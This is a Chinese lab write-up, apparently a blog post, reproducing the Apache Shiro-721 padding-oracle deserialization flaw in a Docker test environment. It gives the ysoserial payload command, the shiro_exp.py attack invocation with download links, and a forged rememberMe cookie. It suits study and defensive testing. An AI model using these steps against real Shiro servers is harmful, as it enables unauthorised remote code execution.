Shiro-721漏洞复现

野性酷女 2023-10-08 22:07 30阅读 0赞

Apache Shiro 存在高危代码执行漏洞。该漏洞是由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题，用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段，并重新请求网站，进行反序列化攻击，最终导致任意代码执行。

影响版本：Apache Shiro <= 1.4.1

## 环境搭建 ##

docker pull vulfocus/shiro-721
    docker run -d -p8080:8080 镜像id

![40ae03d4f8a84f97a58dda8f83a69079.png][]

## 漏洞复现 ##

1.进入登录界面，访问：your-ip:8080/login.jsp

![287164619ccf43f08159a3acf5b45a9d.png][]2.登录 Shiro 测试账户获取 Cookie（勾选Remember Me）：

（1）输入错误的用户名和密码，http响应页面中会显示出deleteMe的cookie:

![fb36c08e96c54a958e5e17bd0c580877.png][]

（2）使用正确的用户名和密码登录，不会显示deletrMe的cookie

![d1a36b0c5ac345379a6366f22b335876.png][]

> 根据以上条件我们的思路是在正常序列化数据（需要一个已知的用户凭证获取正常序列化数据）后利用 Padding Oracle 构造我们自己的数据（Java序列化数据后的脏数据不影响反序列化结果），此时会有两中情况:
> 
> 1.  构造的数据不能通过字符填充验证，返回deleteme;
> 2.  构造的数据可以成功解密通过字符填充验证，之后数据可以正常反序列化，不返回deleteme的cookie.

3.使用正确的用户名密码登录，勾选RememberMe ，进行抓包，放行登录请求包，![6136a05e052240f7a64abd80b8436dd4.png][]

登录成功，获取得到Cookie中的rememberMe值

![e925e0dc7dbf4791b630a02e0219d167.png][]

wq02gcYqkxw4aZ9z30n5H005AXc7VR1kzimNdOvoKVV9vFymsYEaob6I1RKtnmf3t7lJfk4M0qFr/PlYMUc9m/QxPZpRiH6cK/rlKk9FcypSysISrYCuAKsdkPqC5eUVTPHxJjbKO28si0CvIVy5gTyCCGFOXA4M9sz7olNCXV1A2F2YQgKmVCZ35s0YjQlDXNoG/4BDeVFLxlY5pluNSgJeVIX8ePR/QvO517LQW2Q0gvd9BHGwY5GYGS68KbgeE4Xm5ttphgt2N0dEkxz9ijsQgFQ6SCw36s7Ia9U9Uwe61rTXVdVEQo70YAOHckMRoQ1BSKMjp85Z/iyEdtnOlYn6FPN9LNQ9Do8SH68eMQcDbw/2ejuGra3OOsPPs6WwxSMoBZ7pS6JGAyr1RCdQEfQpMJl13tLhd6ah4SvY10TtGPdY9kDrhlt7Gx5IXiKzvoLRzqv8idF26Q2AiaGsEp2bfxChA8PYkciihxGKVsOfbBrtF/Vcn1PDIOdVuTuD

4.使用Java反序列化工具 ysoserial 生成 Payload: 这里可以生成在目标靶机根目录中创建test的payload

[ysoserial-master-2874a69f61-1.jar下载链接][ysoserial-master-2874a69f61-1.jar]

java -jar ysoserial-master-2874a69f61-1.jar CommonsBeanutils1 "touch /usr/local/tomcat/test" > payload.class

![da3140281dc247c48ea9d8261043947f.png][]

5.通过 Padding Oracle Attack生成 Evil Rememberme cookie:

[shiro\_rce\_exp下载链接][shiro_rce_exp]

下载好并解压

cp payload.class  shiro_rce_exp-master
    cd shiro_rce_exp-master 
    python shiro_exp.py http://your-ip:8080/account/  之前获取的RememberMe值   payload.class

![e0b038add26b4f80b438e63ab886e67d.png][]

如果出现如下界面，尝试使用python2 运行一下

![d2da6a9f87144f3f81f0d4d10ef812d1.png][]

python2 shiro_exp.py http://your-ip:8080/account/  之前获取的RememberMe值   payload.class

6.接着就是漫长的等待。。。。。。。。。

> 注意： 此 exp 爆破时间较长，建议使用 ysoserial 生成较短的 payload 验证（如： ping 、 touch /tmp/test等），约 30多分钟可生成正确的 rememberme cookie，生成成功后将自动停止运行。

![02936f12e998441f962a65494af8f65b.png][]

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

7.使用Evil Rememberme cookie 认证进行反序列化攻击：复制该cookie，然后重放一下数据，即可成功执行命令

将之前获取的rememberMe更改为刚才爆破出的结果，并放行

![b59413cf45024986b3942e509b287c19.png][]

8.检查一下执行结果，可以看到成功创建了一个test文件

docker exec -it 容器id /bin/bash

![9a0fe47c5bc64aa191406285ed6b4f32.png][]

复现成功

[40ae03d4f8a84f97a58dda8f83a69079.png]: https://img-blog.csdnimg.cn/40ae03d4f8a84f97a58dda8f83a69079.png
[287164619ccf43f08159a3acf5b45a9d.png]: https://img-blog.csdnimg.cn/287164619ccf43f08159a3acf5b45a9d.png
[fb36c08e96c54a958e5e17bd0c580877.png]: https://img-blog.csdnimg.cn/fb36c08e96c54a958e5e17bd0c580877.png
[d1a36b0c5ac345379a6366f22b335876.png]: https://img-blog.csdnimg.cn/d1a36b0c5ac345379a6366f22b335876.png
[6136a05e052240f7a64abd80b8436dd4.png]: https://img-blog.csdnimg.cn/6136a05e052240f7a64abd80b8436dd4.png
[e925e0dc7dbf4791b630a02e0219d167.png]: https://img-blog.csdnimg.cn/e925e0dc7dbf4791b630a02e0219d167.png
[ysoserial-master-2874a69f61-1.jar]: https://jitpack.io/com/github/frohoff/ysoserial/master-2874a69f61-1/ysoserial-master-2874a69f61-1.jar
[da3140281dc247c48ea9d8261043947f.png]: https://img-blog.csdnimg.cn/da3140281dc247c48ea9d8261043947f.png
[shiro_rce_exp]: https://codeload.github.com/wuppp/shiro_rce_exp/zip/refs/heads/master
[e0b038add26b4f80b438e63ab886e67d.png]: https://img-blog.csdnimg.cn/e0b038add26b4f80b438e63ab886e67d.png
[d2da6a9f87144f3f81f0d4d10ef812d1.png]: https://img-blog.csdnimg.cn/d2da6a9f87144f3f81f0d4d10ef812d1.png
[02936f12e998441f962a65494af8f65b.png]: https://img-blog.csdnimg.cn/02936f12e998441f962a65494af8f65b.png
[b59413cf45024986b3942e509b287c19.png]: https://img-blog.csdnimg.cn/b59413cf45024986b3942e509b287c19.png
[9a0fe47c5bc64aa191406285ed6b4f32.png]: https://img-blog.csdnimg.cn/9a0fe47c5bc64aa191406285ed6b4f32.png